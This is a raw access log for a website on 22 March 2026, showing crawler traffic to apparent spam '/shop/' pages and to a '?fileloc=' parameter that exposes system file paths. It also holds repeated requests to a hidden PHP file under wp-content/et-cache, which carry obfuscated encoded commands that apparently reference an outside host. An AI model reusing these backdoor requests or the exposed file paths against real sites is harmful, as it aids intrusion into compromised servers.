216.73.216.0 - - [22/Mar/2026:01:20:33 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Finfotocap.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12334 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:34 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fipcrm.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 200 12330 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:34 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FTAP%3A%3AParser%3A%3AResultFactory.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:35 -0400] "GET /?fileloc=%2F%2Fkunden%2Fproc%2Fdriver%2Fnvram&path=%2F%2Fkunden%2Fproc%2Fdriver HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:35 -0400] "GET /?fileloc=%2F%2Fusr%2Flib%2Fruby%2F2.7.0%2Frdoc%2Ftext.rb&path=%2F%2Fusr%2Flib%2Fruby%2F2.7.0%2Frdoc HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:35 -0400] "GET /shop/wormiest/aculeatus022962662655.html?path=/homepages/38/d1014097700 HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:36 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FFD_ISSET.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:36 -0400] "GET /shop/multifaced/pittance08549819525.html HTTP/1.1" 200 211149 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:37 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fgetrpcbynumber_r.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:37 -0400] "GET /?fileloc=%2Fhomepages%2F38%2Fd1014936368%2Fhtdocs%2Fclickandbuilds%2FHawkConstruction%2Fwp-admin%2Fpost.php&path=%2Fhomepages%2F38%2Fd1014936368%2Fhtdocs%2Fclickandbuilds%2FHawkConstruction%2Fwp-admin HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:38 -0400] "GET /shop/incredibly/infracting033912087362.html HTTP/1.1" 200 218361 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:39 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fperlthanks.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:39 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Flocale%2Ftr%2FLC_MESSAGES%2Fsed.mo&path=%2F%2Fusr%2Fshare%2Flocale%2Ftr%2FLC_MESSAGES HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:39 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Flocale%2Fnl%2FLC_MESSAGES%2Ftar.mo&path=%2F%2Fusr%2Fshare%2Flocale%2Fnl%2FLC_MESSAGES HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:39 -0400] "GET /shop/lecherousness/matronal021535478013.html?path=//lib HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:20:39 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Flintian%2Foverrides%2Fucf&path=%2F%2Fusr%2Fshare%2Flintian%2Foverrides HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:40 -0400] "GET /shop/wolfhound/caballed03335533801.html HTTP/1.1" 200 211326 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:43 -0400] "GET /shop/volauvent/mistakenly021768327601.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/.tmb HTTP/1.1" 429 267 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:43 -0400] "GET /shop/geophilomorpha/organically031649314498.html HTTP/1.1" 200 217241 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.250.113.0 - - [22/Mar/2026:01:17:32 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303235322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363635322q6335393536376239306236353966303438643331633965303338626462333936222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:17:52 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303237322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363637322q3130356364316330633934633163313462313765643666323530386436633737222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:18:12 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303239322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363639322q6238303730626464363839653036333461326432633166303131353463306630222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:18:32 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303331322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363731322q6361393065643835323766376139346261313435646263386663396132313334222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:18:52 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303333322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363733322q6437633363633332656631613534663361356465653838386530333430663861222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:19:12 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303335322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363735322q6562323530363461323834313930363533303838353431623862636233636636222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:19:32 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303337322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363737322q6334303939626465323639306161646139633535363633313735366433323661222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:19:52 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303339322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363739322q6237636663643863623565343931383630333032323030316339373965653363222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
216.250.113.0 - - [22/Mar/2026:01:20:12 -0400] "GET /wp-content/et-cache/6960/6960/index.php?ARRAY=7o2230223n313737343136303431322p2231223n22687474703n5p2s5p2s7n733739397631336o6s2r7265646s73732r626565725p2s3s6p633q7068705s636s64655s6n6326743q313737343135363831322q3436616438363332353162313261393531373862643563313334303862623530222p2232223n223963306462373035663137316166356332313232633638316238313838393464222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35392q36322q37342q38312q3238227q HTTP/1.1" 200 52 hawk-cs.com "-" "-" "-"
66.249.64.0 - - [22/Mar/2026:01:20:46 -0400] "GET /shop/scutiferous/wraith101566348641.html HTTP/1.1" 200 204156 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:47 -0400] "GET /shop/sissoo/meriones002676858959.html?path=/homepages/38/d1012257368 HTTP/1.1" 200 29998 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:47 -0400] "GET /shop/amethystine/campylotropous06359433330.html HTTP/1.1" 200 207219 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.243.0 - - [22/Mar/2026:01:20:49 -0400] "GET /shop/revisional/erewhon061717834670.html HTTP/1.1" 200 76933 hawk-cs.com "https://hawk-cs.com/sitemap-sub-2034.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:49 -0400] "GET /shop/gladdening/dislimn054198697877.html HTTP/1.1" 200 216214 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:20:52 -0400] "GET /shop/stonebird/cultured022689865622.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction HTTP/1.1" 200 76933 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:53 -0400] "GET /shop/inductile/impoliteness102747660282.html HTTP/1.1" 200 221845 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:55 -0400] "GET /shop/shiloh/canagica04768218002.html HTTP/1.1" 200 210406 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:20:57 -0400] "GET /shop/unbaned/fervor141147808560.html HTTP/1.1" 200 209753 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:00 -0400] "GET /shop/liegemen/canal03650768451.html HTTP/1.1" 200 212712 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:02 -0400] "GET /shop/poker/eyght071377335768.html HTTP/1.1" 200 201366 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:03 -0400] "GET /shop/whitile/punctuative051654866296.html HTTP/1.1" 200 206980 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:04 -0400] "GET /shop/depict/aloud462206956193.html HTTP/1.1" 200 216149 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:07 -0400] "GET /shop/aqualung/chuckerout032250912494.html HTTP/1.1" 200 209839 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:09 -0400] "GET /shop/countersalient/djinns043430583214.html HTTP/1.1" 200 204667 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:12 -0400] "GET /shop/fatimite/regie062756084634.html HTTP/1.1" 200 224222 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:14 -0400] "GET /shop/canter/luxuriant014129700144.html HTTP/1.1" 200 210798 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:16 -0400] "GET /shop/megaptera/remittor01838128771.html HTTP/1.1" 200 212929 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:18 -0400] "GET /shop/stradometrical/queenly063398475280.html HTTP/1.1" 200 221223 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:18 -0400] "GET /shop/preservative/beduck001573859229.html HTTP/1.1" 200 213264 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:19 -0400] "GET /shop/jacquerie/bragless012780645028.html HTTP/1.1" 200 217906 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:22 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FTest2%3A%3AAPI%3A%3AContext.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:22 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Flibsub-quote-perl%2Fchangelog.Debian.gz&path=%2F%2Fusr%2Fshare%2Fdoc%2Flibsub-quote-perl HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:23 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FTest2%3A%3AIPC.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:23 -0400] "GET /shop/brontosaurus/embay01493679248.html HTTP/1.1" 200 211947 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [22/Mar/2026:01:21:23 -0400] "GET /shop/fulminic/musca021208289920.html?path=/homepages/38/d1014936368/htdocs/clickandbuilds HTTP/1.1" 200 17472 hawk-cs.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:23 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FDateTime%3A%3ALocale%3A%3Anyn.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:24 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Flintian%2Foverrides%2Faptitude-common&path=%2F%2Fusr%2Fshare%2Flintian%2Foverrides HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:24 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fgcc-10-base%2Fchangelog.Debian.gz&path=%2F%2Fusr%2Fshare%2Fdoc%2Fgcc-10-base HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:25 -0400] "GET /shop/moutan/lanyard041925729036.html HTTP/1.1" 200 214897 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:26 -0400] "GET /?fileloc=%2F%2Fkunden%2Fproc%2Fdma&path=%2F%2Fkunden%2Fproc HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:26 -0400] "GET /?fileloc=%2F%2Fusr%2Flib%2Fruby%2F2.7.0%2Frdoc%2Falias.rb&path=%2F%2Fusr%2Flib%2Fruby%2F2.7.0%2Frdoc HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:26 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FMIME%3A%3AHead.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:27 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman1%2Fzshroadmap.1.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman1 HTTP/1.1" 429 267 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:27 -0400] "GET /shop/cribble/diedral06814616953.html HTTP/1.1" 200 219363 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:29 -0400] "GET /shop/goodtime/eclaircise012866439160.html HTTP/1.1" 200 215417 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:31 -0400] "GET /shop/cardiovascular/stamened003456615690.html HTTP/1.1" 200 215133 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.243.0 - - [22/Mar/2026:01:21:31 -0400] "GET /shop/trichomatous/vulva061328100447.html HTTP/1.1" 200 76933 hawk-cs.com "https://hawk-cs.com/sitemap-sub-2034.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:33 -0400] "GET /shop/haglin/parergy032891336369.html HTTP/1.1" 200 221953 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.64.0 - - [22/Mar/2026:01:21:36 -0400] "GET /shop/rudesby/freighter052141756187.html HTTP/1.1" 200 205130 hawk-cs.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
